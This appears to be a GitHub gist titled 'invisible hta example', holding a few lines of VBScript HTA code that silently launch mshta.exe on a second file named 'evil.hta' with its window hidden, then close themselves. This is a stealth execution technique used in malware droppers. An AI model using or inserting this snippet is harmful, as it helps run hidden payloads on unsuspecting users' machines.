Skip to content

Instantly share code, notes, and snippets.

@jpginc
Last active September 27, 2018 15:55
Show Gist options
  • Save jpginc/2d2810eaf1444b2705afbab8b388a391 to your computer and use it in GitHub Desktop.
Save jpginc/2d2810eaf1444b2705afbab8b388a391 to your computer and use it in GitHub Desktop.
invisible hta example
<SCRIPT LANGUAGE="VBScript">
set a = CreateObject("WScript.Shell")
visible = false
a.run "mshta.exe ""file:///evil.hta""", visible
window.close()
</SCRIPT>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment